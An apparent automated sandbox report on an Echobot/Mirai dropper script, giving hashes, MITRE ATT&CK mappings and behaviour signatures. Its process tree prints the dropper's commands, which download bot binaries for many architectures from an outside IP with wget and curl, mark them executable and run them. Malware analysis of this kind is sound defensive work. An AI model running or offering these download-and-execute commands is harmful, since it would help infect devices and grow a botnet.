echobot | b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30

Analysis

max time kernel
150s
max time network
177s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 21:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

81eee2b1d28af46c8e9190b0c20fce28
SHA1

8025e6d6f83b129d6c7a11a684d5d6f54d160333
SHA256

b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30
SHA512

359baa5371f4f8cbd4c3caf9cb1b02624b22d8cadd63722c2a9db673e73df55f6f75988e988911ee731e3b30b5a1c22207cd9a8aebb933c38bab17f9a1f8df45

Score

10^/10

echobot mirai antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 3 IoCs

Processes:

resource	yara_rule
/tmp/Chaotic	family_echobot
/tmp/Chaotic	family_echobot
/tmp/Chaotic	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (162203) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

823 chmod
768 chmod
863 chmod
879 chmod
844 chmod
750 chmod
779 chmod
802 chmod
716 chmod
699 chmod
730 chmod
893 chmod
909 chmod
925 chmod
692 chmod

pid	process
823	chmod
768	chmod
863	chmod
879	chmod
844	chmod
750	chmod
779	chmod
802	chmod
716	chmod
699	chmod
730	chmod
893	chmod
909	chmod
925	chmod
692	chmod

Executes dropped EXE 15 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

ioc	pid	process
/tmp/Chaotic	693	Chaotic
/tmp/Chaotic	700	Chaotic
/tmp/Chaotic	718	Chaotic
/tmp/Chaotic	731	Chaotic
/tmp/Chaotic	752	Chaotic
/tmp/Chaotic	769	Chaotic
/tmp/Chaotic	781	Chaotic
/tmp/Chaotic	803	Chaotic
/tmp/Chaotic	824	Chaotic
/tmp/Chaotic	845	Chaotic
/tmp/Chaotic	864	Chaotic
/tmp/Chaotic	880	Chaotic
/tmp/Chaotic	894	Chaotic
/tmp/Chaotic	910	Chaotic
/tmp/Chaotic	926	Chaotic

Modifies Watchdog functionality 1 TTPs 16 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic

Enumerates active TCP sockets 1 TTPs 8 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 8 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	11dmc1d1moch22kg	803	Chaotic
Changes the process name, possibly in an attempt to hide itself	1d35j04ojaa3af122ec	824	Chaotic
Changes the process name, possibly in an attempt to hide itself	15eo2mioiopkbioa32	845	Chaotic
Changes the process name, possibly in an attempt to hide itself	bkeah1geimb04bd	864	Chaotic
Changes the process name, possibly in an attempt to hide itself	dndmpij4nig0gomn1hm	880	Chaotic
Changes the process name, possibly in an attempt to hide itself	1edhi1omcohp5a5343h	894	Chaotic
Changes the process name, possibly in an attempt to hide itself	j131ck1i21paccn2	910	Chaotic
Changes the process name, possibly in an attempt to hide itself	12h1aijgh3odcja	926	Chaotic

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads system network configuration 1 TTPs 8 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticcurlChaoticChaoticcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/1/fd	Chaotic
File opened for reading	/proc/881/exe	Chaotic
File opened for reading	/proc/1/fd	Chaotic
File opened for reading	/proc/897/exe	Chaotic
File opened for reading	/proc/1/fd	Chaotic
File opened for reading	/proc/286/fd	Chaotic
File opened for reading	/proc/211/fd	Chaotic
File opened for reading	/proc/913/exe	Chaotic
File opened for reading	/proc/166/fd	Chaotic
File opened for reading	/proc/664/fd	Chaotic
File opened for reading	/proc/166/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/284/fd	Chaotic
File opened for reading	/proc/305/fd	Chaotic
File opened for reading	/proc/333/fd	Chaotic
File opened for reading	/proc/662/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/284/fd	Chaotic
File opened for reading	/proc/306/fd	Chaotic
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/333/fd	Chaotic
File opened for reading	/proc/211/fd	Chaotic
File opened for reading	/proc/829/exe	Chaotic
File opened for reading	/proc/142/fd	Chaotic
File opened for reading	/proc/305/fd	Chaotic
File opened for reading	/proc/306/fd	Chaotic
File opened for reading	/proc/286/fd	Chaotic
File opened for reading	/proc/829/fd	Chaotic
File opened for reading	/proc/829/fd	Chaotic
File opened for reading	/proc/865/exe	Chaotic
File opened for reading	/proc/333/fd	Chaotic
File opened for reading	/proc/606/fd	Chaotic
File opened for reading	/proc/662/fd	Chaotic
File opened for reading	/proc/211/fd	Chaotic
File opened for reading	/proc/283/fd	Chaotic
File opened for reading	/proc/832/fd	Chaotic
File opened for reading	/proc/599/fd	Chaotic
File opened for reading	/proc/269/fd	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/211/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/660/exe	Chaotic
File opened for reading	/proc/664/exe	Chaotic
File opened for reading	/proc/607/fd	Chaotic
File opened for reading	/proc/284/fd	Chaotic
File opened for reading	/proc/283/fd	Chaotic
File opened for reading	/proc/284/fd	Chaotic
File opened for reading	/proc/607/fd	Chaotic
File opened for reading	/proc/662/fd	Chaotic
File opened for reading	/proc/829/fd	Chaotic
File opened for reading	/proc/664/fd	Chaotic
File opened for reading	/proc/933/exe	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/306/fd	Chaotic
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/654/fd	Chaotic
File opened for reading	/proc/599/fd	Chaotic
File opened for reading	/proc/881/fd	Chaotic
File opened for reading	/proc/318/fd	Chaotic
File opened for reading	/proc/607/fd	Chaotic
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/659/exe	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

curlcatwgetcurlcatwget

pid process

764 curl
767 cat
732 wget
742 curl
749 cat
756 wget

pid	process
764	curl
767	cat
732	wget
742	curl
749	cat
756	wget

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetcurlcurlcurlwgetwgetcurlwgetcurlcurlcurlcurlcurlwgetwgetcurlcurlohshit.shcurlcurlcurlwgetwgetwgetcurlcp

description	ioc	process
File opened for modification	/tmp/jade.mpsl	wget
File opened for modification	/tmp/jade.arm	wget
File opened for modification	/tmp/jade.arm6	curl
File opened for modification	/tmp/jade.arm7	curl
File opened for modification	/tmp/jade.i686	curl
File opened for modification	/tmp/jade.arm6	wget
File opened for modification	/tmp/jade.ppc	wget
File opened for modification	/tmp/jade.sparc	curl
File opened for modification	/tmp/jade.m68k	wget
File opened for modification	/tmp/jade.m68k	curl
File opened for modification	/tmp/jade.arc	curl
File opened for modification	/tmp/jade.x86	curl
File opened for modification	/tmp/jade.mips	curl
File opened for modification	/tmp/jade.ppc	curl
File opened for modification	/tmp/jade.x86	wget
File opened for modification	/tmp/jade.mips	wget
File opened for modification	/tmp/jade.mpsl	curl
File opened for modification	/tmp/jade.arm	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/jade.x86_64	curl
File opened for modification	/tmp/jade.mips64	curl
File opened for modification	/tmp/jade.arm5	curl
File opened for modification	/tmp/jade.arm7	wget
File opened for modification	/tmp/jade.arm5	wget
File opened for modification	/tmp/jade.sh4	wget
File opened for modification	/tmp/jade.sh4	curl
File opened for modification	/tmp/busybox	cp

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:662
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:665
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arc
  2⤵
  PID:671
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:685
- /bin/cat
  cat jade.arc
  2⤵
  PID:691
- /bin/chmod
  chmod +x busybox Chaotic jade.arc ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:692
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:693
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:694
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/cat
  cat jade.x86
  2⤵
  PID:698
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.x86 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:699
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:700
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86_64
  2⤵
  PID:702
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:708
- /bin/cat
  cat jade.x86_64
  2⤵
  PID:714
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:716
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:718
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.i686
  2⤵
  PID:719
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:724
- /bin/cat
  cat jade.i686
  2⤵
  PID:729
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:731
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:732
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat jade.mips
  2⤵
  - System Network Configuration Discovery
  PID:749
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:752
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:756
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips64
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:764
- /bin/cat
  cat jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:767
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.mips64 jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:769
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:770
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:771
- /bin/cat
  cat jade.mpsl
  2⤵
  PID:778
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:781
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:783
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:794
- /bin/cat
  cat jade.arm
  2⤵
  PID:800
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:803
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:819
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:824
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:835
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm6
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:842
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-Wrd8pD
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:845
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:854
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm7
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:861
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:864
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:868
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.ppc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:877
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:880
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sparc
  2⤵
  PID:884
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sparc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:891
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:893
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:894
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:900
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.m68k
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:907
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:910
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:916
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sh4 jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:926

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
68KB

MD5
60e197919a265617f21c21e25320c549

SHA1
b06f09b251f855c2e3cadbee08e426be790698cf

SHA256
bd145676c6767709d39d47eb2bb2fe5051b790db64bf150b233d3f49438346b2

SHA512
652f8341e27f00272f3ee4164900c5f02e0c7c763b9edc0405107ce2126ce2c700c9318e3ea29a73125d77d4b16b961860a514b0580170d019976fa7765792d1

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
2856dfee64ce9df390f7c08f3faa4511

SHA1
a39ec395140d9f12df3f3ce77b40380a22bcd336

SHA256
10cde4e442151ff031996d6cd72f7da0df4ce93f434caed9a21e14ed1e1a60dc

SHA512
d089fe05d65e225b160306f738588496119d1329c24aba8613b751388f49f8deb0ec45c0ac2a1df40e3208102404d0a029a2c72fd4bef9db6c31080afcee5b3e

Download Submit
/tmp/Chaotic

Filesize
99KB

MD5
66be265a705fef7afdbf7a0225b79bf5

SHA1
41148213aaf7c47d5f100e46e95c01c04a048ecf

SHA256
ccba950254fd41cd63ca06d39dd224e46c9a0b45b17699e0421ef8e19d69ebd8

SHA512
fbe5bae02a9bf1a5f96eda723e9cfaa86fc81f8acffed7e07987f3dc4ad9d745ce3de1de2b6cee7e9b41cd1437db0212c4678710b30b737299b12c24825a8e2a

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/jade.arc

Filesize
275B

MD5
cba0261779bc762dcaa59e48bca8c298

SHA1
f5747b8818b87d36e684c31ee32cae265ae63cd0

SHA256
52ea3a00ff42e925a9f1862b63765b9ac279abb244f7e43ac010e42c76fcc918

SHA512
f322ac8ba03308f52db0478080d60f419d2bc195d4eeccee0365fd66d13f99032c491f55ae952dd9685064825f07b5c8c381a68ca3928c22164009861b3da702

Download Submit